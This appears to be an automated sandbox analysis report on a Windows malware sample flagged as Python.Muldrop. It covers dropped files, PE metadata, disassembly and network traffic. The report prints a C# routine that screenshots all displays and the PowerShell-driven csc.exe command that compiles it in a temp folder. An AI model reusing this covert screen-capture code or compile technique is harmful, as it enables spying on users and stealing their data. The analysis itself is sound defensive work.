                                                          Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...c.3.m.2.u.w.l.3...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...c.3.m.2.u.w.l.3...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                          C:\Users\user\AppData\Local\Temp\c3m2uwl3\c3m2uwl3.0.cs

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1004
                                                          Entropy (8bit):4.154581034278981
                                                          Encrypted:false
                                                          SSDEEP:24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
                                                          MD5:C76055A0388B713A1EABE16130684DC3
                                                          SHA1:EE11E84CF41D8A43340F7102E17660072906C402
                                                          SHA-256:8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
                                                          SHA-512:22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
                                                          Malicious:false
                                                          Preview:.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..

                                                          C:\Users\user\AppData\Local\Temp\c3m2uwl3\c3m2uwl3.cmdline

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (602), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):605
                                                          Entropy (8bit):5.32847055359316
                                                          Encrypted:false
                                                          SSDEEP:12:p37Lvkmb6KOkqe1xBkrk+ikywZlJNqWZEmwZlJNP:V3ka6KOkqeFkywZLNLEmwZLNP
                                                          MD5:AEDFC64557B6F34DD38D424B7F29C3AC
                                                          SHA1:D83F5FA2C5445D931E5D13A479B0EAF607C34FD9
                                                          SHA-256:CEA30CB802B48EAF9ABD99C363BAD4749E4E990B5FC906FB5A77509DCA24A970
                                                          SHA-512:F6F8F3AA99993D4300998C99C7D3C151805F8D83AA95BD1F5AB056034308CE137A21F8A7B0CAF713B3D4D7D715B04EB7EE9FE4D8C2EDF35E7A630276F8CC79DA
                                                          Malicious:true
                                                          Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\c3m2uwl3\c3m2uwl3.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\c3m2uwl3\c3m2uwl3.0.cs"

                                                          C:\Users\user\AppData\Local\Temp\c3m2uwl3\c3m2uwl3.dll

                                                          Download File
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):4096
                                                          Entropy (8bit):3.157698300889665
                                                          Encrypted:false
                                                          SSDEEP:48:6w7oEAtf0KhzBU/Sf6mtJ5N0ypW1ul+a3qq:INz0dmhOAwK
                                                          MD5:610AE113CAFEA9C4E817CF31B44DFF62
                                                          SHA1:C750EADDD9C7779914F21932704E899C1A537B97
                                                          SHA-256:25059A20725DD4455B81118294B8119998D7078CEC09C9FD21A701E4B29C036E
                                                          SHA-512:CF82D8F6DCAB143BC6475938325D022FF4AD3F2D30E82470414573C0F2AAEB96DA6BC925E1037ED9B5DE838460C29C592F113F64F98DF132D0F787223304FC96
                                                          Malicious:false
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Nf...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k....*...(....B.(j........9.Q...........{.........(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................

                                                          C:\Users\user\AppData\Local\Temp\c3m2uwl3\c3m2uwl3.out

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (705), with CRLF, CR line terminators
                                                          Category:modified
                                                          Size (bytes):1146
                                                          Entropy (8bit):5.497753934515472
                                                          Encrypted:false
                                                          SSDEEP:24:KTwZnDkId3ka6KOkqeFkywZLNLEmwZLN2Kax5DqBVKVrdFAMBJTH:mwZnDkkka6NkqeFkywZhEmwZYK2DcVKN
                                                          MD5:62E47E855EBE317D0B7608686F8641C8
                                                          SHA1:C407B10949CDA00A3E061ECCEF3DF2E2FF48D545
                                                          SHA-256:77F407B02ED6E6B26D15758154FC45CB794A1AF5014ED2427613EBF73E356387
                                                          SHA-512:7C8CFDD912411F13C8EA3FEF960B907CD4F2C9D49C9638EB048DCCE38958B203CF51A43B9BFC91A59D8E0A7163BDCD14A87572FC44F8A1F3ABE0ABA172B3F904
                                                          Malicious:false
                                                          Preview:.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\c3m2uwl3\c3m2uwl3.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\c3m2uwl3\c3m2uwl3.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer t

                                                          \Device\ConDrv

                                                          Download File
                                                          Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):97
                                                          Entropy (8bit):4.331807756485642
                                                          Encrypted:false
                                                          SSDEEP:3:lyAZFXZDLsFzAXmZrCZDL4QXAVJK4v:lyqBtoJAXmoZDL4CA1v
                                                          MD5:195D02DA13D597A52F848A9B28D871F6
                                                          SHA1:D048766A802C61655B9689E953103236EACCB1C7
                                                          SHA-256:ADE5C28A2B27B13EFB1145173481C1923CAF78648E49205E7F412A2BEFC7716A
                                                          SHA-512:1B9EDA54315B0F8DB8E43EC6E78996464A90E84DE721611647E8395DBE259C282F06FB6384B08933F8F0B452B42E23EE5A7439974ACC5F53DAD64B08D39F4146
                                                          Malicious:false
                                                          Preview:..Service Version: 0.0.0.0..Engine Version: 0.0.0.0....No engine/signature is currently loaded...

                                                          Static File Info

                                                          General

                                                          File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                          Entropy (8bit):7.9923255929664
                                                          TrID:
                                                          • Win64 Executable GUI (202006/5) 92.65%
                                                          • Win64 Executable (generic) (12005/4) 5.51%
                                                          • Generic Win/DOS Executable (2004/3) 0.92%
                                                          • DOS Executable Generic (2002/1) 0.92%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
                                                          File size:7'266'369 bytes
                                                          MD5:030c3c535b2d8f10ceaeede6e3fe23f2
                                                          SHA1:032ef2c8e717960d9b49dd7e48e4fc761cb4cfed
                                                          SHA256:e57e596af8f957f936d2a698b1a66697a1a7390eadb08af386060130d342db2d
                                                          SHA512:86499b8990f5f591927c7bdf6af18fe74400812104661ac870409ac5025cecc2bf29c890046f961d69b3a00c632bf6f05ac6b501e4b832769ba2f46258c29e35
                                                          SSDEEP:98304:bFzHqdVfB2FS27wbuyuT/9vUIdD9C+z3zO917vOTh+ezDNh7xvmJ1nmOBN9n4mp3:b5QsJbT/9bvLz3S1bA3zgn97v3
                                                          TLSH:3D7633AAA3C149F5E477863DC2C28905DAB075270364DACB03F4A6B21F17ED58D3BB52
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................................-.....................,.............................................................Rich...........

                                                          File Icon

                                                          Icon Hash:00928e8e8686b000

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x14000c330
                                                          Entrypoint Section:.text
                                                          Digitally signed:true
                                                          Imagebase:0x140000000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x65FE458B [Sat Mar 23 02:59:23 2024 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:5
                                                          OS Version Minor:2
                                                          File Version Major:5
                                                          File Version Minor:2
                                                          Subsystem Version Major:5
                                                          Subsystem Version Minor:2
                                                          Import Hash:1af6c885af093afc55142c2f1761dbe8

                                                          Authenticode Signature

                                                          Signature Valid:false
                                                          Signature Issuer:CN=Sectigo Public Code Signing CA EV R36, O=Sectigo Limited, C=GB
                                                          Signature Validation Error:The digital signature of the object did not verify
                                                          Error Number:-2146869232
                                                          Not Before, Not After
                                                          • 29/09/2021 01:00:00 29/09/2024 00:59:59
                                                          Subject Chain
                                                          • CN=Akeo Consulting, O=Akeo Consulting, S=Donegal, C=IE, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=IE, SERIALNUMBER=407950
                                                          Version:3
                                                          Thumbprint MD5:5C82B2D08EFE6EE0794B52D4309C5F37
                                                          Thumbprint SHA-1:3DBC3A2A0E9CE8803B422CFDBC60ACD33164965D
                                                          Thumbprint SHA-256:60E992275CC7503A3EBA5D391DB8AEAAAB001402D49AEA3F7F5DA3706DF97327
                                                          Serial:00BFB15001BBF592D4962A7797EA736FA3

                                                          Entrypoint Preview

                                                          Instruction
                                                          dec eax
                                                          sub esp, 28h
                                                          call 00007F8E64B8912Ch
                                                          dec eax
                                                          add esp, 28h
                                                          jmp 00007F8E64B88D4Fh
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          dec eax
                                                          sub esp, 28h
                                                          call 00007F8E64B896A4h
                                                          test eax, eax
                                                          je 00007F8E64B88EF3h
                                                          dec eax
                                                          mov eax, dword ptr [00000030h]
                                                          dec eax
                                                          mov ecx, dword ptr [eax+08h]
                                                          jmp 00007F8E64B88ED7h
                                                          dec eax
                                                          cmp ecx, eax
                                                          je 00007F8E64B88EE6h
                                                          xor eax, eax
                                                          dec eax
                                                          cmpxchg dword ptr [000351BCh], ecx
                                                          jne 00007F8E64B88EC0h
                                                          xor al, al
                                                          dec eax
                                                          add esp, 28h
                                                          ret
                                                          mov al, 01h
                                                          jmp 00007F8E64B88EC9h
                                                          int3
                                                          int3
                                                          int3
                                                          dec eax
                                                          sub esp, 28h
                                                          test ecx, ecx
                                                          jne 00007F8E64B88ED9h
                                                          mov byte ptr [000351A5h], 00000001h
                                                          call 00007F8E64B894B1h
                                                          call 00007F8E64B89AB8h
                                                          test al, al
                                                          jne 00007F8E64B88ED6h
                                                          xor al, al
                                                          jmp 00007F8E64B88EE6h
                                                          call 00007F8E64B97A1Fh
                                                          test al, al
                                                          jne 00007F8E64B88EDBh
                                                          xor ecx, ecx
                                                          call 00007F8E64B89AC8h
                                                          jmp 00007F8E64B88EBCh
                                                          mov al, 01h
                                                          dec eax
                                                          add esp, 28h
                                                          ret
                                                          int3
                                                          int3
                                                          inc eax
                                                          push ebx
                                                          dec eax
                                                          sub esp, 20h
                                                          cmp byte ptr [0003516Ch], 00000000h
                                                          mov ebx, ecx
                                                          jne 00007F8E64B88F39h
                                                          cmp ecx, 01h
                                                          jnbe 00007F8E64B88F3Ch
                                                          call 00007F8E64B8961Ah
                                                          test eax, eax
                                                          je 00007F8E64B88EFAh
                                                          test ebx, ebx
                                                          jne 00007F8E64B88EF6h
                                                          dec eax
                                                          lea ecx, dword ptr [00035156h]
                                                          call 00007F8E64B97812h

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x3e0940x78.rdata
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x470000x944.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x430000x2304.pdata
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x6ebbf90x2448
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x480000x758.reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x3b4400x1c.rdata
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x3b3000x140.rdata
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x2c0000x420.rdata
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x10000x2adb00x2ae0075d19a4940b1c41e95d0f65f35d07455False0.5456735149416909data6.502519008894634IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .rdata0x2c0000x12ebc0x130000cf19f6ad5be1ba2b4a4b3f42e838817False0.515393708881579data5.816356361767986IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .data0x3f0000x33b80xe00c77d6acf176d4b487ea671c3fd3a6945False0.13392857142857142firmware 32a2 vdf2d (revision 2569732096) \377\377\377\377 , version 256.0.512, 0 bytes or less, at 0xcd5d20d2 1725235199 bytes , at 0 0 bytes , at 0xffffffff 16777216 bytes1.828047079050098IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .pdata0x430000x23040x2400f9c9a5a34be2cb8fd1246f51c7b22c72False0.4797092013888889data5.38202672986895IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          _RDATA0x460000x1f40x2004ec0234c233e8c5ae54cd80f9630ff86False0.525390625data3.698330622853966IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .rsrc0x470000x9440xa0030edc79cb3b52956b6a45d27978d1b89False0.425data5.117264574383496IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc0x480000x7580x800f1d633c1708caf707b59b5e59d6f78b3False0.54443359375data5.24651730799357IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                          Resources

                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                          RT_VERSION0x470a00x394OpenPGP Secret Key0.45087336244541487
                                                          RT_MANIFEST0x474340x50dXML 1.0 document, ASCII text0.4694508894044857

                                                          Imports

                                                          DLLImport
                                                          USER32.dllCreateWindowExW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
                                                          COMCTL32.dll
                                                          KERNEL32.dllIsValidCodePage, GetStringTypeW, GetFileAttributesExW, HeapReAlloc, FlushFileBuffers, GetCurrentDirectoryW, GetACP, GetOEMCP, GetModuleHandleW, MulDiv, GetLastError, SetDllDirectoryW, GetModuleFileNameW, CreateSymbolicLinkW, GetProcAddress, GetCommandLineW, GetEnvironmentVariableW, GetCPInfo, ExpandEnvironmentStringsW, CreateDirectoryW, GetTempPathW, WaitForSingleObject, Sleep, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LoadLibraryExW, SetConsoleCtrlHandler, FindClose, FindFirstFileExW, CloseHandle, GetCurrentProcess, LocalFree, FormatMessageW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, WriteConsoleW, SetEndOfFile, SetEnvironmentVariableW, RtlUnwindEx, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, CreateFileW, GetDriveTypeW, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, GetFullPathNameW, RemoveDirectoryW, FindNextFileW, SetStdHandle, DeleteFileW, ReadFile, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, CompareStringW, LCMapStringW
                                                          ADVAPI32.dllOpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
                                                          GDI32.dllSelectObject, DeleteObject, CreateFontIndirectW

                                                          Network Behavior

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          May 23, 2024 01:36:49.175780058 CEST4971480192.168.2.9208.95.112.1
                                                          May 23, 2024 01:36:49.181057930 CEST8049714208.95.112.1192.168.2.9
                                                          May 23, 2024 01:36:49.181145906 CEST4971480192.168.2.9208.95.112.1
                                                          May 23, 2024 01:36:49.181269884 CEST4971480192.168.2.9208.95.112.1
                                                          May 23, 2024 01:36:49.232743025 CEST8049714208.95.112.1192.168.2.9
                                                          May 23, 2024 01:36:49.702807903 CEST8049714208.95.112.1192.168.2.9
                                                          May 23, 2024 01:36:49.754935980 CEST4971480192.168.2.9208.95.112.1
                                                          May 23, 2024 01:36:49.902086973 CEST49715443192.168.2.9162.159.135.232
                                                          May 23, 2024 01:36:49.902138948 CEST44349715162.159.135.232192.168.2.9
                                                          May 23, 2024 01:36:49.902286053 CEST49715443192.168.2.9162.159.135.232
                                                          May 23, 2024 01:36:49.928217888 CEST49715443192.168.2.9162.159.135.232
                                                          May 23, 2024 01:36:49.928237915 CEST44349715162.159.135.232192.168.2.9
                                                          May 23, 2024 01:36:50.402914047 CEST44349715162.159.135.232192.168.2.9
                                                          May 23, 2024 01:36:50.403409958 CEST49715443192.168.2.9162.159.135.232
                                                          May 23, 2024 01:36:50.403436899 CEST44349715162.159.135.232192.168.2.9
                                                          May 23, 2024 01:36:50.404323101 CEST44349715162.159.135.232192.168.2.9
                                                          May 23, 2024 01:36:50.404385090 CEST49715443192.168.2.9162.159.135.232
                                                          May 23, 2024 01:36:50.405066967 CEST49715443192.168.2.9162.159.135.232
                                                          May 23, 2024 01:36:50.405124903 CEST44349715162.159.135.232192.168.2.9
                                                          May 23, 2024 01:36:50.405412912 CEST49715443192.168.2.9162.159.135.232
                                                          May 23, 2024 01:36:50.405419111 CEST44349715162.159.135.232192.168.2.9
                                                          May 23, 2024 01:36:50.405644894 CEST49715443192.168.2.9162.159.135.232
                                                          May 23, 2024 01:36:50.405673027 CEST44349715162.159.135.232192.168.2.9
                                                          May 23, 2024 01:36:50.405750036 CEST49715443192.168.2.9162.159.135.232
                                                          May 23, 2024 01:36:50.405776978 CEST44349715162.159.135.232192.168.2.9
                                                          May 23, 2024 01:36:50.405874968 CEST49715443192.168.2.9162.159.135.232
                                                          May 23, 2024 01:36:50.405889034 CEST44349715162.159.135.232192.168.2.9
                                                          May 23, 2024 01:36:50.406244993 CEST49715443192.168.2.9162.159.135.232
                                                          May 23, 2024 01:36:50.406256914 CEST44349715162.159.135.232192.168.2.9
                                                          May 23, 2024 01:36:50.406276941 CEST49715443192.168.2.9162.159.135.232
                                                          May 23, 2024 01:36:50.406284094 CEST44349715162.159.135.232192.168.2.9
                                                          May 23, 2024 01:36:50.406321049 CEST49715443192.168.2.9162.159.135.232
                                                          May 23, 2024 01:36:50.406328917 CEST44349715162.159.135.232192.168.2.9
                                                          May 23, 2024 01:36:50.406404018 CEST49715443192.168.2.9162.159.135.232
                                                          May 23, 2024 01:36:50.406409979 CEST44349715162.159.135.232192.168.2.9
                                                          May 23, 2024 01:36:50.406428099 CEST49715443192.168.2.9162.159.135.232
                                                          May 23, 2024 01:36:50.406439066 CEST49715443192.168.2.9162.159.135.232
                                                          May 23, 2024 01:36:50.406440973 CEST44349715162.159.135.232192.168.2.9
                                                          May 23, 2024 01:36:50.406447887 CEST44349715162.159.135.232192.168.2.9
                                                          May 23, 2024 01:36:50.406452894 CEST49715443192.168.2.9162.159.135.232
                                                          May 23, 2024 01:36:50.406457901 CEST44349715162.159.135.232192.168.2.9
                                                          May 23, 2024 01:36:50.406521082 CEST49715443192.168.2.9162.159.135.232
                                                          May 23, 2024 01:36:50.406527996 CEST44349715162.159.135.232192.168.2.9
                                                          May 23, 2024 01:36:50.406547070 CEST49715443192.168.2.9162.159.135.232
                                                          May 23, 2024 01:36:50.406555891 CEST49715443192.168.2.9162.159.135.232
                                                          May 23, 2024 01:36:50.406570911 CEST49715443192.168.2.9162.159.135.232
                                                          May 23, 2024 01:36:50.406624079 CEST49715443192.168.2.9162.159.135.232
                                                          May 23, 2024 01:36:50.406651974 CEST49715443192.168.2.9162.159.135.232
                                                          May 23, 2024 01:36:50.406657934 CEST49715443192.168.2.9162.159.135.232
                                                          May 23, 2024 01:36:50.406675100 CEST49715443192.168.2.9162.159.135.232
                                                          May 23, 2024 01:36:50.406722069 CEST49715443192.168.2.9162.159.135.232
                                                          May 23, 2024 01:36:50.406728983 CEST49715443192.168.2.9162.159.135.232
                                                          May 23, 2024 01:36:50.406750917 CEST49715443192.168.2.9162.159.135.232
                                                          May 23, 2024 01:36:50.406785011 CEST49715443192.168.2.9162.159.135.232
                                                          May 23, 2024 01:36:50.406816006 CEST49715443192.168.2.9162.159.135.232
                                                          May 23, 2024 01:36:50.425864935 CEST44349715162.159.135.232192.168.2.9
                                                          May 23, 2024 01:36:50.426000118 CEST49715443192.168.2.9162.159.135.232
                                                          May 23, 2024 01:36:50.426011086 CEST44349715162.159.135.232192.168.2.9
                                                          May 23, 2024 01:36:50.426065922 CEST49715443192.168.2.9162.159.135.232
                                                          May 23, 2024 01:36:50.426075935 CEST44349715162.159.135.232192.168.2.9
                                                          May 23, 2024 01:36:50.426094055 CEST49715443192.168.2.9162.159.135.232
                                                          May 23, 2024 01:36:50.426114082 CEST49715443192.168.2.9162.159.135.232
                                                          May 23, 2024 01:36:50.426125050 CEST49715443192.168.2.9162.159.135.232
                                                          May 23, 2024 01:36:50.426134109 CEST49715443192.168.2.9162.159.135.232
                                                          May 23, 2024 01:36:50.426141977 CEST44349715162.159.135.232192.168.2.9
                                                          May 23, 2024 01:36:50.426168919 CEST49715443192.168.2.9162.159.135.232
                                                          May 23, 2024 01:36:50.426189899 CEST49715443192.168.2.9162.159.135.232
                                                          May 23, 2024 01:36:50.426203966 CEST49715443192.168.2.9162.159.135.232
                                                          May 23, 2024 01:36:50.426212072 CEST49715443192.168.2.9162.159.135.232
                                                          May 23, 2024 01:36:50.426222086 CEST49715443192.168.2.9162.159.135.232
                                                          May 23, 2024 01:36:50.426255941 CEST44349715162.159.135.232192.168.2.9
                                                          May 23, 2024 01:36:50.426259041 CEST49715443192.168.2.9162.159.135.232
                                                          May 23, 2024 01:36:50.426285982 CEST49715443192.168.2.9162.159.135.232
                                                          May 23, 2024 01:36:50.426296949 CEST49715443192.168.2.9162.159.135.232
                                                          May 23, 2024 01:36:50.426314116 CEST49715443192.168.2.9162.159.135.232
                                                          May 23, 2024 01:36:50.426322937 CEST49715443192.168.2.9162.159.135.232
                                                          May 23, 2024 01:36:50.426341057 CEST49715443192.168.2.9162.159.135.232
                                                          May 23, 2024 01:36:50.426353931 CEST49715443192.168.2.9162.159.135.232
                                                          May 23, 2024 01:36:50.426362038 CEST44349715162.159.135.232192.168.2.9
                                                          May 23, 2024 01:36:50.426405907 CEST44349715162.159.135.232192.168.2.9
                                                          May 23, 2024 01:36:50.426409960 CEST49715443192.168.2.9162.159.135.232
                                                          May 23, 2024 01:36:50.426431894 CEST49715443192.168.2.9162.159.135.232
                                                          May 23, 2024 01:36:50.426450014 CEST49715443192.168.2.9162.159.135.232
                                                          May 23, 2024 01:36:50.426465034 CEST49715443192.168.2.9162.159.135.232
                                                          May 23, 2024 01:36:50.426481962 CEST49715443192.168.2.9162.159.135.232
                                                          May 23, 2024 01:36:50.426490068 CEST49715443192.168.2.9162.159.135.232
                                                          May 23, 2024 01:36:50.426512957 CEST49715443192.168.2.9162.159.135.232
                                                          May 23, 2024 01:36:50.426525116 CEST49715443192.168.2.9162.159.135.232
                                                          May 23, 2024 01:36:50.426542997 CEST49715443192.168.2.9162.159.135.232
                                                          May 23, 2024 01:36:50.426553011 CEST49715443192.168.2.9162.159.135.232
                                                          May 23, 2024 01:36:50.426562071 CEST44349715162.159.135.232192.168.2.9
                                                          May 23, 2024 01:36:50.426582098 CEST49715443192.168.2.9162.159.135.232
                                                          May 23, 2024 01:36:50.426624060 CEST49715443192.168.2.9162.159.135.232
                                                          May 23, 2024 01:36:50.426632881 CEST49715443192.168.2.9162.159.135.232
                                                          May 23, 2024 01:36:50.426676989 CEST44349715162.159.135.232192.168.2.9
                                                          May 23, 2024 01:36:50.435913086 CEST44349715162.159.135.232192.168.2.9
                                                          May 23, 2024 01:36:51.151699066 CEST44349715162.159.135.232192.168.2.9
                                                          May 23, 2024 01:36:51.151858091 CEST44349715162.159.135.232192.168.2.9
                                                          May 23, 2024 01:36:51.151932955 CEST49715443192.168.2.9162.159.135.232
                                                          May 23, 2024 01:36:51.152772903 CEST49715443192.168.2.9162.159.135.232
                                                          May 23, 2024 01:36:51.167581081 CEST4971480192.168.2.9208.95.112.1
                                                          May 23, 2024 01:36:51.205621958 CEST8049714208.95.112.1192.168.2.9
                                                          May 23, 2024 01:36:51.205692053 CEST4971480192.168.2.9208.95.112.1

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          May 23, 2024 01:36:49.166210890 CEST5308453192.168.2.91.1.1.1
                                                          May 23, 2024 01:36:49.174890995 CEST53530841.1.1.1192.168.2.9
                                                          May 23, 2024 01:36:49.894299030 CEST6431853192.168.2.91.1.1.1
                                                          May 23, 2024 01:36:49.901182890 CEST53643181.1.1.1192.168.2.9
                                                          May 23, 2024 01:36:54.921638012 CEST5353187162.159.36.2192.168.2.9
